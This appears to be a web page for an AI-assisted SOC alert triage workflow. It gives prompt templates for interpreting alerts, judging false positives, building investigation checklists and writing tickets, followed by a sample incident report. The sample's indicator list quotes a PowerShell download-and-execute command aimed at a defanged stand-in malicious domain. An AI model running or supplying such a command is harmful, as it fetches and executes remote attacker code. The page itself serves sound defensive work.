// soc alert triage

SOC Alert Triage

// paste alert or log data

🔒 Browser-only · No data uploaded

Alert type:

// paste data and click analyse alert

Verdict, severity, MITRE mapping & recommended next steps

Prefer the manual workflow? Follow the step-by-step investigation below.

High volume of alerts to prioritise
Unknown alert requiring classification
Determining severity of new detection

[00]

Context Setup

▶

Before using this workflow, fill in this context template and include it with Step 1: Alert Source Tool: [Splunk / Microsoft Sentinel / CrowdStrike / Defender / Other] Alert Name / Rule Name: [e.g. "Possible Credential Dumping - LSASS Access"] Hostname: [e.g. DESKTOP-7F3K2] Username: [e.g. john.smith or SYSTEM] Timestamp (UTC): [e.g. 2024-01-15 14:32:07] Environment: [Corporate Workstation / Server / Cloud Instance / Other] Any additional context: [e.g. user is in Finance, machine is domain-joined] Tip: Specifying your SIEM tool dramatically improves output quality — Claude and ChatGPT know the exact query syntax for Splunk SPL, KQL, and CrowdStrike event data.

[01]

Alert Interpretation

▶

You are a SOC analyst. I will paste a security alert below along with context about the affected system. Based on the alert data provided: 1. What exactly triggered this alert? Describe the specific behavior detected. 2. What was the affected system doing at the time of the alert? 3. If this is malicious — what is the likely attacker objective? (e.g. credential access, persistence, lateral movement) 4. What are the top 3 legitimate false positive scenarios for this specific alert? 5. What additional context would most help you determine if this is real? Be specific to the data I provide. Do not give generic answers. [PASTE YOUR ALERT DATA AND CONTEXT FROM STEP 0 HERE]

[02]

False Positive vs True Positive Assessment

▶

Based on the alert from Step 1, assess the likelihood that this is a true positive. First analyze patterns, then produce findings. Evaluate: 1. Is this behavior normal for this type of user or system? Why or why not? 2. Does the timing make sense? (business hours vs off hours, frequency, duration) 3. Is the volume or frequency consistent with legitimate activity? 4. Does this fit a known attack pattern or does it fit a known benign pattern? 5. Are there any corroborating signals that increase or decrease suspicion? Output: - TP Likelihood: High / Medium / Low - Most Likely Explanation: [one sentence] - Top False Positive Scenario: [one sentence] - What single piece of evidence would definitively confirm or rule out malicious activity?

[03]

Targeted Investigation Checklist

▶

Based on the alert and your TP/FP assessment from Step 2, generate a specific investigation checklist. For each item provide: - Exact log source to check (e.g. "Windows Security Event Log") - Specific event IDs or field values to look for (e.g. "Event ID 4625 — failed logon") - What a malicious result looks like vs a benign result Also provide: - 2-3 SIEM queries written for [Splunk SPL / KQL / CrowdStrike — specify which] - Which other systems or hosts should be reviewed - Any IOCs to hunt across the environment (IPs, hashes, process names) Do not give generic advice like "check your logs." Give me specific, actionable steps based on the actual alert data.

[04]

Severity Verdict & Ticket

▶

Based on all previous steps, provide a final disposition for this alert. Severity: [Low / Medium / High / Critical] Disposition: [True Positive / False Positive / Needs Further Investigation] Escalate: [Yes / No] — If Yes: who to escalate to and what to include Immediate Containment Actions (if applicable): - [specific action 1] - [specific action 2] 3-4 Sentence Ticket Summary: Write a concise, professional ticket summary suitable for your SIEM or ticketing system. Include: what triggered the alert, what investigation found, current disposition, and next action owner.

Example Output

Here's what you can expect after completing this workflow:

SOC ALERT TRIAGE REPORT ======================= ALERT SUMMARY ------------- Alert ID: EDR-2024-0789 Alert Name: Suspicious PowerShell Execution with Encoded Command Detection Time: 2024-01-15 14:23:45 UTC Triage Completion Time: 2024-01-15 14:52:18 UTC Analyst: Sarah Chen (Tier 1 SOC) Final Classification: TRUE POSITIVE - Confirmed Malicious Activity Severity: HIGH EXECUTIVE SUMMARY ----------------- A workstation (LAPTOP-FINANCE-07) executed an obfuscated PowerShell command that downloaded and executed a remote payload from a known malicious domain. The activity originated from a user account (jsmith@company.com) during legitimate business hours. Investigation confirms this is a malware infection, likely from a phishing email. The system has been isolated and requires immediate forensic analysis and remediation. TECHNICAL FINDINGS ------------------ Affected Assets: - Hostname: LAPTOP-FINANCE-07 (Windows 10 Pro) - IP Address: 10.50.25.143 - User: jsmith@company.com (Finance Department) - Last Seen: 2024-01-15 14:50:00 UTC (currently isolated) Confirmed IOCs: - Process: powershell.exe -enc <base64_encoded_command> - Decoded command: IEX (New-Object Net.WebClient).DownloadString('hxxp://malicious-domain[.]xyz/payload.ps1') - Malicious Domain: malicious-domain[.]xyz (IP: 185.220.101.89) - File Created: C:\Users\jsmith\AppData\Roaming\svchost.exe (fake system file) - Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecurityUpdate - Outbound Connection: 185.220.101.89:443 (TLS encrypted C2 communication) RECOMMENDED ACTIONS ------------------- IMMEDIATE (within 15 minutes): 1. Isolated LAPTOP-FINANCE-07 from network (14:45 UTC) 2. Blocked malicious-domain[.]xyz and IP 185.220.101.89 at firewall/proxy 3. Disabled user account jsmith@company.com temporarily 4. Notified Security Manager and Finance Department Manager MITRE ATT&CK MAPPING -------------------- T1566.002 - Phishing: Spearphishing Link T1059.001 - Command and Scripting Interpreter: PowerShell T1027 - Obfuscated Files or Information T1105 - Ingress Tool Transfer T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys T1071.001 - Application Layer Protocol: Web Protocols (C2)

Generate SOC Investigation Summary

Populate a ready-to-paste investigation report for your ticket or incident log.

Copied!